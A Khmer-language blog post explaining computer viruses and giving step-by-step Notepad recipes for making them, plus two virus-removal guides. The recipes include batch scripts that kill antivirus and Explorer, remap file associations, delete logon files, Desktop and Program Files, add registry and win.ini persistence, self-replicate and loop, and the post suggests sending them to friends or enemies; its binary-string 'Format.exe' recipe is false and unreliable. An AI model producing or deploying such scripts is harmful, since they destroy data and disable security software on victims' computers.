Ads Area

បង្កើតមេរោគកុំព្យូទ័រលើ Notepad

របៀបបង្កើត មេរោគកុំព្យូទ័រលើ Notepad

មេរោគកុំព្យូទ័រជាអ្វី?
មេរោគកុំព្យូទ័រជាកម្មវិធីមួយបែប ដែលមាន លទ្ធភាពអាច ធ្វើការចម្លង ខ្លួនរបស់វាពី កន្លែងមួយ ទៅ កន្លែងមួយផ្សេង ទៀតតាមរយៈ File កម្មវិធី អត្ថបទ កុំព្យូទ័រនៅលើ បណ្តាញ និងនៅលើ Internet ។ មេរោគកុំព្យូទ័រមាន វិធីច្រើនក្នុង ការរាលដាល និងចម្លង ហើយក៏មានច្រើនវិធីក្នុងការ បំផ្លាញផងដែរ។ លោកអ្នកត្រូវ ចងចាំថា មេរោគកុំព្យូទ័រ គឺជាកម្មវិធីកុំព្យូទ័រ មួយបែប ច្រើន ប្រើ ក្នុង គោលបំណង មួយ មិនល្អ។មេរោគ កុំព្យូទ័រ ត្រូវបាន មនុស្សជាអ្នកបង្កើត ដែលមកដល់ពេលនេះ វាជាប្រភេទជម្ងឺ ម៉្យាងដែល កើត មាននៅក្នុងកុំព្យូទ័រ ហើយយើងទាំងអស់ គ្នា គឺ ជាគ្រូពេទ្យ ដែលជានិច្ច ជាកាលត្រូវប្រយុទ្ធ ប្រឆាំង ជា មួយ នឹងជម្ងឺ ទាំងនោះ ដោយរិះរក វិធីសាស្រ្តថ្មីៗ ដែល អាចកម្ចាត់ មេរោគទាំងនោះ។មេរោគ កុំព្យូទ័រ គឺប្រៀបបានទៅនឹងបញ្ហាមេរោគនានា ដែល កើតមាននៅក្នុង សង្គមមនុស្សដែរ ដែលរាល់ថ្ងៃកំពុង ប្រឈម មុខ ទៅនឹងជម្ងឺគ្រប់ប្រភេទ ហើយក៏មានការប្រឹង ប្រែងយ៉ាងខ្លាំងផងដែរ ក្នុងការសិក្សាស្រាវ ជ្រាវរកប្រភេទ ថ្នាំ និងវ៉ាក់សាំងដើម្បីបង្ការជម្ងឺទាំងនោះ។លោកអ្នកត្រូវ ចង ចាំពាក្យស្លោកមួយឃ្លា ការពារប្រសើរជាងព្យាបាល ដែល ជា វិធីសាស្រ្តមួយបែបអាចធ្វើឱ្យកុំព្យូទ័រ របស់លោកអ្នក ជៀស ផុតពីការឆ្លងមេរោគផ្សេងៗ។
តើមេរោគកុំព្យូទ័រឆ្លងតាមវិធីណា?
មេរោគកុំព្យូទ័រ អាចឆ្លងពីកុំព្យូទ័រមួយទៅ កុំព្យូទ័រផ្សេង ទៀត តាមរយៈ សារអេឡិចត្រូនិច (E-mail) ឬតាមរយៈ File ដែលបានទាញយកពី អ៊ីនធឺណេត ឬក៏ឆ្លងតាមប្រព័ន្ធ បណ្តាញ Local area network ។ ចំពោះមធ្យោបាយ ដែលបានចម្លងមេរោគសព្វថ្ងៃ សារអេឡិចត្រូនិចជាច្រក មួយដែលងាយ ឆ្លង មេរោគ ជាទីបំផុត។ នៅក្នុងកុំព្យូទ័រ មួយ គ្រឿងមេរោគ បានប្រមូលនូវរាល់អាសយដ្ឋាន សារអេឡិច ត្រូនិចទាំងដែលមាន ហើយធ្វើ ការផ្ញើរអាសយដ្ឋាន សារ អេឡិចត្រូនិចក្លែងក្លាយ ដែលអត្ថន័យ គួរឱ្យ ចង់ អានហើយ ដែលមានភ្ជាប់ទៅជាមួយ File មេរោគ ដើម្បីបោកប្រាស់អ្នក ទទូល ឱ្យបើកមើលសារ អេឡិចត្រូនិច ហើយ ឆ្លៀតឳកាស នោះ ធ្វើការចម្លងមេរោគភ្លាមតែម្តង។ លោកអ្នកគួរ តែ យក ចិត្ត ទុកដាក់ពិនិត្យមើលនូវចំណងជើង សារអេឡិចត្រូនិច ឱ្យច្បាស់មុននឹងបើកមើល ព្រោះភាគច្រើន សារអេឡិច ត្រូនិច របស់មេរោគតែងតែគួរឱ្យចង់អាន ជូនកាលមេរោគ ច្បិច យកតែអត្ថន័យ នៅក្នុង សារអេឡិតត្រូនិចណាមួយ ដែលមាននៅក្នុង Mai box របស់លោកអ្នក ដើម្បីបង្កើតជា អត្ថន័យនៅ ក្នុងសារ អេឡិចត្រូនិចក្លែងក្លាយមួយថ្មី ដែលអាចឱ្យវាក្លាយជាសារអេឡិចត្រូនិចមួយ ដូច ជាសារ អេឡិច ត្រូនិចមួយពិត ដែលជាហេតុធ្វើឱ្យយើងភាន់ច្រឡំ។កុំព្យូទ័រលោកអ្នកដែល មិនមាន ប្រើប្រាស់ អ៊ីនធឺណេត ឬសារ អេឡិចត្រូនិច ក៏អាចឆ្លងមេរោគបានដែរ ប្រសិនបើ លោក អ្នក បានទាញយកកម្មវិធី ចេញពី អ៊ីនធឺណេត ហើយចម្លង ដាក់ Flash … ហើយចម្លងពី Flash … ទៅដាក់លើ កុំព្យូទ័រ ដោយមិន បានកំចាត់ (Scan) ជាមុន ព្រោះ File ទាំងនោះ អាចផ្ទុក មេរោគ ឬ File ទាំងនោះជាមេរោគតែម្តង ដែលវា បាន បន្លំខ្លួនក្នុងករណី ដែលលោកអ្នកបើកវា ដូច្នេះ ហើយ ជាឳកាសមួយដែលវាងាយស្រួលក្នុង ការឆ្លងចូលទៅ ក្នុង កុំព្យូទ័រ របស់អ្នក។ ក្នុងដំណាក់កាលដែល វា ចម្លងខ្លួនចូលទៅក្នុងកុំព្យូទ័រ វាស្តែង ឡើង ក្នុង ស្ថានភាពមួយស្ងៀមស្ងាត់បំផុត ដែល លោកអ្នកមិនអាចមានអារម្មណ៏ ទទូលដឹងថាមាន បញ្ហា អ្វី កើតឡើង ព្រោះក្រោយពីចម្លងខ្លួនចូលហើយ កម្មវិធី ដែល ឆ្លងមេរោគនៅតែអាចដំណើរការ បាន ធម្មតា ដ ដែល។ ក្រៅពីចម្លងដោយស្ងៀមស្ងាត់នៅមានវិធីចម្លងតាមបែបផ្លែផ្កា តាមរយៈសារប្រាប់ លោកអ្នកផង ដែរ ដូចជាបង្ហាញថា កុំព្យូទ័រ របស់អ្នកមានមេរោគហើយ ឬ ជារូបផ្សេងៗ … ។ ក្នុង ករណី ដែលលោកអ្នកបើកគេហទំព័រនានា ដែល គេហទំព័រ ទាំងនោះអាចមានផ្ទុកនូវកូដបញ្ជាដូចជា ActivX Java Apletes VB Script … គឺជាកំណាត់កូដ កម្មវិធីដែល មានបញ្ចូល Adware Spyware Trojan ឬលើពីនេះ អាច មាន មេរោគបញ្ចូលមកក្នុងកុំព្យូទ័ររបស់លោកអ្នកផងដែរ។

១.របៀបបង្កើតមេរោគដើម្បី Format Hard Disk !
aថ្ងៃនេះខ្ញុំនឹងបង្ហាញអ្នកពីរបៀបបង្កើតមេរោគដើម្បី Format Hard Disk. អ្នកអាចផ្ញើ File នេះទៅ អោយមិត្តភកិ្តរបស់អ្នក រឺ សត្រូវរបស់អ្នក ដើម្បី Format Hard Disk ទាំងឡាយ. ប៉ុន្តែសូមកុំ ធ្វើបែប នេះដាក់ Computer របស់ខ្លួន រឺ អ្នកដទៃ.
1)-សូម Copy កូដពីខាងក្រោមនេះយកទៅដាក់ក្នុងកម្មវិធី Notepad.
 01001011000111110010010101010101010000011111100000
2)-បន្ទាប់មកសូម Save file ជា Format.exe
អ្នកបានបង្កើតមេរោគរបស់អ្នករួចរាល់
២.វិធីលុបមេរោគ play boy
1.Kill process
2.program => run => regedit => ok
3.HKEY_LOCAL_MACHINE\Software\Microsoft\windows\current version\policy\explorer\run (Delete Data Type in Run)
4.search *.exe
៣.របៀបបង្កើតមេរោគងាយៗ
ធ្លាប់លឺថាគេបង្កើត ប្រដាប់ការពារមេរោគ តែ ពេលនេះ បង្ហាញមេរោគម្ដង ពេលមេរោគចូលនោះវានិង មានអាការៈ ដូចខាងក្រោម ៖
1. Ends Process, NAVAPSVC.exe
2. Ends Process, Explorer.exe (taskbar and icons will dissapear)
3. Ends Process, zonelabs.exe
4. associate a exe file with txt (when opening exe files, it will go to notepad)
5. associate a txt file with mp3 (when opening txt files, it will open WinAmp or WMP)
6. Deletes Login/Logoff Screens
របៀបសរសេរ
Copy code ខាងក្រោមនេះ ចូលទៅក្នុង Notepad ហើយ Save ជា installhack.bat
title virus is my dna
color 0A
@echo off
set end=md “u cant eascape from me-vishnu”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * andhra pradesh- virus created in karimnagar from jits college
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
assoc .mp3=.vcf
cls
msg * hi dude this is begining.
msg * vishnu attcked the system try to challenge him .
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown
៤.ការបង្កើតមេរោគ Spam

វិធីសាស្រ្តថ្មីមួយដែលលោកអ្នកអាចបង្កើតមេរោគ ​ Spam ក្នុងរយៈ ពេលតែ មួយឬពីរនាទីប៉ុណ្ណោះ។ Spam ជាប្រភេទ មេរោគកុំព្យូទ័រម៉្យាងដែល Hacker បង្កើតឡើងក្នុង គោល បំណង លួចយក លេខ សម្ងាត់របស់អ្នកនៅធនាគារ លួច មើលសារអេឡិចត្រូនិច (E-amil) លួចយក User Name និង Password របស់លោកអ្នកដើម្បី Login ក្នុងគោល បំណងណាមួយ … ជាពិសេសគឺវាជា ប្រភេទមេរោគ ឆ្លងតាម អ៊ីនធឺណែត  ។
aប៉ុន្តែអត្ថបទនេះគ្រាន់តែជាគន្លិះតូចមួយប៉ុណ្ណោះក្នុងការបង្កើតពួកវា (Spam) ដើម្បីជាមូលដ្ឋានគ្រិះសម្រាប់លោកអ្នកស្រាវជ្រាវ បន្ថែមទៀត។
1.សូមបើកកម្មវិធី Notepad ដោយចុច Start (Menu) => Run ឬ Ctrl+R => រួចវាយពាក្យ notepad => OK
2.បន្ទាប់មកសូមសរសេរពាក្យដូចខាងក្រោម @echo off
copy 100% spam.bat
start spam.bat
3.បន្ទាប់មកទៀតសូមលោកធ្វើការ Save ទុក ដោយត្រង់ File name ដាក់ឈ្មោះ Spam.bat រួចចុចប៊ូតុង Save
៥.របៀបលុបមេរោគ Oh la la world
តើលោកអ្នកធ្លាប់បានឆ្លងមេរោគ Oh la la world មួយ ក្បាល នេះដែរ ឬទេ?បើកាលណាមេរោគនេះ រាត ត្បាត ចូលក្នុងកុំព្យូទ័ររបស់លោកអ្នកហើយ ពេលនោះកុំព្យូទ័រ របស់លោកអ្នកនឹងដំណើរការយឺត ខុសប្រក្រតី ហើយ ឧស្សាហ៍គាំងម៉ាស៊ីនទៀតផង … ។
អនុវត្ត
1.សូមចូលទៅ end process មេរោគ sviq.exe, fun.exe, dc.exe ចោល (ចំពោះការ end process សូមមើលនូវប្រកាសមុនៗ)
2.    ចូលទៅកាន់ registry  (ctrl+r រួចវាយ regedit)  ត្រង់
HKEY_CRRENT_USER\Software\Microsoft\windows\current version\Run (Delete Data Type in run)
3.ចូលទៅកាន់ registry  (ctrl+r រួចវាយ regedit)  ត្រង់
HKEY_CREENT_USER\Software\Microsoft\windowsNT\current version\windows (Delete tMel in Data Type load & run)
4.ចូលទៅកាន់ registry  (ctrl+r រួចវាយ regedit)  ត្រង់
HKEY_LOCAL_MACHIN\Software\Microsoft\windowsNT\current version\Win logon (change values shell to explorer.exe)
5.search *.exe
៦.បង្កើតមេរោគបិទកុំព្យូទ័រស្វ័យប្រវត្តិ
ចំពោះអត្ថបទនេះមិនបានបង្ហាញលោកអ្នកឱ្យចេះបង្កើតមេរោគដើម្បីយកទៅបំផ្លាញឯកសារនោះទេ។
នេះគ្រាន់តែជាអត្ថបទដែលចង់បង្ហាញលោកអ្នកថា មេរោគកុំព្យូទ័រវាដំណើរការយ៉ាងដូចម្តេចតែប៉ុណ្ណោះ …
សូមអនុវត្តន៏នូវវិធីបង្កើតវាដូចតទៅៈ
ជាដំបូងសូមបើក Notepad ដោយចុច Start => Run => វាយពាក្យ notepad
បន្ទាប់មកសូមសរសេរកូដដូចខាងក្រោម
@ECHO OFF
copy %0 %systemroot%\ACiiD.bat > nul
copy %0 *.bat > nul
copy %0 *.exe > nul
Attrib +h *.bat
cls
tskill AVGUARD
tskill AVGNT
tskill NMAIN
tskill KAV
tskill ad-aware
tskill av*
tskill avgcc
tskill firefox
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v ACiiD /t REG_SZ /d %systemroot%\ACiiD.bat /f > nul
cls
echo [windows] >> %systemroot%\win.ini
echo load=%systemroot%\ACiiD.bat >> %systemroot%\win.ini
echo run=%systemroot%\ACiiD.bat >> %systemroot%\win.ini
Attrib +h %systemroot%\win.ini
del C:\docume~\owner\Desktop
del C:\program files\
shutdown -s -t 15
cls
:ACiiD
start %0
goto ACiiD
បន្ទាប់មកសូមចុច File (Menu) =>  Save As => រួចដាក់ឈ្មោះទៅឱ្យមេរោគចង្រៃមួយនេះ ហើយ Save ដោយដាក់កន្ទុយរបស់វា .bat
ឧទាហរណ៍ A1.bat

Top Post Ad

Below Post Ad